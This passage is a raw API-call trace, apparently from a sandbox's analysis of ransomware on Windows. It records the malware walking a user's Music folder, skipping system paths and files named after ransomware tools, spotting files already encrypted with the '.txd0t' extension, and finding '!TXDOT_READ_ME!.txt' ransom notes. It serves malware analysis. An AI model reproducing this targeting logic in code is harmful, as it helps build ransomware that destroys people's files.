lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13397, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cAlternateFileName="ZAYDV7~1.TXD")) returned 0 [0090.209] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.210] GetProcessHeap () returned 0xe30000 [0090.210] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecaff8 | out: hHeap=0xe30000) returned 1 [0090.210] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd178d9f0, ftCreationTime.dwHighDateTime=0x1d5ea4c, ftLastAccessTime.dwLowDateTime=0xf27b55d0, ftLastAccessTime.dwHighDateTime=0x1d5e0d6, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8da5, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="fXQDJP18MMdWjvedkW4.mp3.txd0t", cAlternateFileName="FXQDJP~1.TXD")) returned 1 [0090.210] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3.txd0t", psz2=".") returned 1 [0090.210] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3.txd0t", psz2="..") returned 1 [0090.210] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="fXQDJP18MMdWjvedkW4.mp3.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t" [0090.210] PathFindExtensionW (pszPath="fXQDJP18MMdWjvedkW4.mp3.txd0t") returned=".txd0t" [0090.210] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.210] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="JI_ROcYP5iaMyIhA11bQ", cAlternateFileName="JI_ROC~1")) returned 1 [0090.210] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2=".") returned 1 [0090.210] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2="..") returned 1 [0090.210] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="JI_ROcYP5iaMyIhA11bQ", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system32\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\local\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\boot\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\perflogs\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\programdata\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\drivers\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\wsus\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="crypt_detect") returned 0x0 [0090.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="cryptolocker") returned 0x0 [0090.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="ransomware") returned 0x0 [0090.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\WINDOWS") returned 0x0 [0090.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files") returned 0x0 [0090.211] GetProcessHeap () returned 0xe30000 [0090.211] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xecaff8 [0090.211] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0090.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*" [0090.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0090.211] StrCmpW (psz1=".", psz2=".") returned 0 [0090.211] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.211] StrCmpW (psz1="..", psz2=".") returned 1 [0090.211] StrCmpW (psz1="..", psz2="..") returned 0 [0090.211] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c79a1b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51c79a1b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.211] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.211] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.211] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0090.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0090.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt" [0090.211] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.211] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.212] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.212] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.212] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.212] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.212] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.212] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.212] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7e45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3.txd0t", cAlternateFileName="U7KCAM~1.TXD")) returned 1 [0090.212] StrCmpW (psz1="U7kcA.mp3.txd0t", psz2=".") returned 1 [0090.212] StrCmpW (psz1="U7kcA.mp3.txd0t", psz2="..") returned 1 [0090.212] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0090.212] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0090.212] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="U7kcA.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t" [0090.212] PathFindExtensionW (pszPath="U7kcA.mp3.txd0t") returned=".txd0t" [0090.212] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.212] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7e45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3.txd0t", cAlternateFileName="U7KCAM~1.TXD")) returned 0 [0090.212] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0090.212] GetProcessHeap () returned 0xe30000 [0090.212] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecaff8 | out: hHeap=0xe30000) returned 1 [0090.212] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43d9ce90, ftCreationTime.dwHighDateTime=0x1d5e6e3, ftLastAccessTime.dwLowDateTime=0x9fad7510, ftLastAccessTime.dwHighDateTime=0x1d5e57f, ftLastWriteTime.dwLowDateTime=0x51cc5ebf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa77f, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="m-T19pWPhwjALOHNq.wav.txd0t", cAlternateFileName="M-T19P~1.TXD")) returned 1 [0090.212] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav.txd0t", psz2=".") returned 1 [0090.212] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav.txd0t", psz2="..") returned 1 [0090.212] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.212] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.212] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="m-T19pWPhwjALOHNq.wav.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t" [0090.212] PathFindExtensionW (pszPath="m-T19pWPhwjALOHNq.wav.txd0t") returned=".txd0t" [0090.212] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.212] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="rUUROgRx9gfXRUYVye", cAlternateFileName="RUUROG~1")) returned 1 [0090.212] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2=".") returned 1 [0090.212] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2="..") returned 1 [0090.212] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.212] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.212] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="rUUROgRx9gfXRUYVye", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.212] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system32\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\local\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\boot\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\perflogs\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\programdata\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\drivers\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\wsus\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="crypt_detect") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="cryptolocker") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="ransomware") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\WINDOWS") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.213] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files") returned 0x0 [0090.213] GetProcessHeap () returned 0xe30000 [0090.213] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xecaff8 [0090.213] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.213] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*" [0090.213] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22b0 [0090.213] StrCmpW (psz1=".", psz2=".") returned 0 [0090.213] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.213] StrCmpW (psz1="..", psz2=".") returned 1 [0090.214] StrCmpW (psz1="..", psz2="..") returned 0 [0090.214] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cec0b9, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51cec0b9, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51cec0b9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.214] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.214] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.214] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.214] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0090.214] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt" [0090.214] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.214] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.214] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.214] FindNextFileW (in: hFindFile=0xec22b0, 